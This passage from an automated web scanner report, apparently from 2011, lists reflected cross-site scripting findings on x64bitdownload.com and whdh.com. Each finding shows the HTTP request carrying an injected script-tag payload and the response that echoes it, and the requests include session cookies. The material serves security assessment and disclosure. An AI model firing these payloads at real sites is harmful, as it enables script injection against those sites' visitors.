Path:	/submit-pad-file.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd8c4"><script>alert(1)</script>c00cfdcf2d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /submit-pad-file.htmlbd8c4"><script>alert(1)</script>c00cfdcf2d9 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:29:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/submit-pad-file.htmlbd8c4"><script>alert(1)</script>c00cfdcf2d9" />
...[SNIP]...

4.1848. http://www.x64bitdownload.com/submit-pad-file.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/submit-pad-file.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1427b"><script>alert(1)</script>c7b5b0e2601 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /submit-pad-file.html?1427b"><script>alert(1)</script>c7b5b0e2601=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/submit-pad-file.html?1427b"><script>alert(1)</script>c7b5b0e2601=1" />
...[SNIP]...

4.1849. http://www.x64bitdownload.com/tellafriend.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/tellafriend.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1567d"><script>alert(1)</script>357966335fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tellafriend.html1567d"><script>alert(1)</script>357966335fd HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:24:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/tellafriend.html1567d"><script>alert(1)</script>357966335fd" />
...[SNIP]...

4.1850. http://www.x64bitdownload.com/tellafriend.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/tellafriend.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb5d8"><script>alert(1)</script>439cf2505d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tellafriend.html?bb5d8"><script>alert(1)</script>439cf2505d6=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:22:11 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/tellafriend.html?bb5d8"><script>alert(1)</script>439cf2505d6=1" />
...[SNIP]...

4.1851. http://www.x64bitdownload.com/templates/X64/css/rating.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/templates/X64/css/rating.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be6ec"><script>alert(1)</script>d3d7a4e3e9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templatesbe6ec"><script>alert(1)</script>d3d7a4e3e9d/X64/css/rating.css HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/templatesbe6ec"><script>alert(1)</script>d3d7a4e3e9d/X64/css/rating.css" />
...[SNIP]...

4.1852. http://www.x64bitdownload.com/templates/X64/css/rating.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/templates/X64/css/rating.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10a3c"><script>alert(1)</script>8a1532546b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templates/X6410a3c"><script>alert(1)</script>8a1532546b6/css/rating.css HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/templates/X6410a3c"><script>alert(1)</script>8a1532546b6/css/rating.css" />
...[SNIP]...

4.1853. http://www.x64bitdownload.com/templates/X64/css/rating.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/templates/X64/css/rating.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa220"><script>alert(1)</script>18ce10ab220 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templates/X64/cssfa220"><script>alert(1)</script>18ce10ab220/rating.css HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/templates/X64/cssfa220"><script>alert(1)</script>18ce10ab220/rating.css" />
...[SNIP]...

4.1854. http://www.x64bitdownload.com/templates/X64/css/rating.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/templates/X64/css/rating.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acf7e"><script>alert(1)</script>3af3c139581 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templates/X64/css/rating.cssacf7e"><script>alert(1)</script>3af3c139581 HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/templates/X64/css/rating.cssacf7e"><script>alert(1)</script>3af3c139581" />
...[SNIP]...

4.1855. http://www.x64bitdownload.com/templates/X64/css/x64_main.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/templates/X64/css/x64_main.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ddb4"><script>alert(1)</script>3c49f3529e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templates6ddb4"><script>alert(1)</script>3c49f3529e7/X64/css/x64_main.css HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:15 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/templates6ddb4"><script>alert(1)</script>3c49f3529e7/X64/css/x64_main.css" />
...[SNIP]...

4.1856. http://www.x64bitdownload.com/templates/X64/css/x64_main.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/templates/X64/css/x64_main.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4258f"><script>alert(1)</script>7057cfe06f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templates/X644258f"><script>alert(1)</script>7057cfe06f/css/x64_main.css HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/templates/X644258f"><script>alert(1)</script>7057cfe06f/css/x64_main.css" />
...[SNIP]...

4.1857. http://www.x64bitdownload.com/templates/X64/css/x64_main.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/templates/X64/css/x64_main.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea3de"><script>alert(1)</script>3f9e9d602b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templates/X64/cssea3de"><script>alert(1)</script>3f9e9d602b4/x64_main.css HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:22 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/templates/X64/cssea3de"><script>alert(1)</script>3f9e9d602b4/x64_main.css" />
...[SNIP]...

4.1858. http://www.x64bitdownload.com/templates/X64/css/x64_main.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/templates/X64/css/x64_main.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e77f"><script>alert(1)</script>b3861bca820 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templates/X64/css/x64_main.css2e77f"><script>alert(1)</script>b3861bca820 HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Referer: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 14:59:25 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/templates/X64/css/x64_main.css2e77f"><script>alert(1)</script>b3861bca820" />
...[SNIP]...

4.1859. http://www.x64bitdownload.com/top-software-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/top-software-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 452a6"><script>alert(1)</script>aad361d3eee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /top-software-downloads.html452a6"><script>alert(1)</script>aad361d3eee HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:26:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/top-software-downloads.html452a6"><script>alert(1)</script>aad361d3eee" />
...[SNIP]...

4.1860. http://www.x64bitdownload.com/top-software-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/top-software-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81c04"><script>alert(1)</script>82fac2b2da7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /top-software-downloads.html?81c04"><script>alert(1)</script>82fac2b2da7=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:23:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 140126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/top-software-downloads.html?81c04"><script>alert(1)</script>82fac2b2da7=1" />
...[SNIP]...

4.1861. http://www1.whdh.com/features/articles/dish/BO144734/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www1.whdh.com
Path:	/features/articles/dish/BO144734/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9b6a"><a>6635c8f9e01 was submitted in the REST URL parameter 4. This input was echoed as b9b6a\"><a>6635c8f9e01 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/dish/BO144734b9b6a"><a>6635c8f9e01/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

4.1862. http://www1.whdh.com/features/articles/dish/BO144759/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www1.whdh.com
Path:	/features/articles/dish/BO144759/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5ac4"><a>b14a891ae7 was submitted in the REST URL parameter 4. This input was echoed as d5ac4\"><a>b14a891ae7 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/dish/BO144759d5ac4"><a>b14a891ae7/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:47 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=7150
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:07 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close
Content-Length: 11910

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Dish - </title>
<meta name="publisher" content="New England News Station Boston
...[SNIP]...
<a href="javascript:void(0);" onclick="ShareLink(this,'http://www.whdh.com/features/articles/dish/BO144759d5ac4\"><a>b14a891ae7/','')" onmouseout="ShareLinkClose()">
...[SNIP]...

4.1863. http://www1.whdh.com/features/articles/dish/BO144797/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www1.whdh.com
Path:	/features/articles/dish/BO144797/

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab001"><a>7bdcb52ea9d was submitted in the REST URL parameter 4. This input was echoed as ab001\"><a>7bdcb52ea9d in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /features/articles/dish/BO144797ab001"><a>7bdcb52ea9d/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:57:48 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 1
Cache-Control: max-age=7150
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 23:56:08 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close
Content-Length: 11914

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>The Dish - </title>
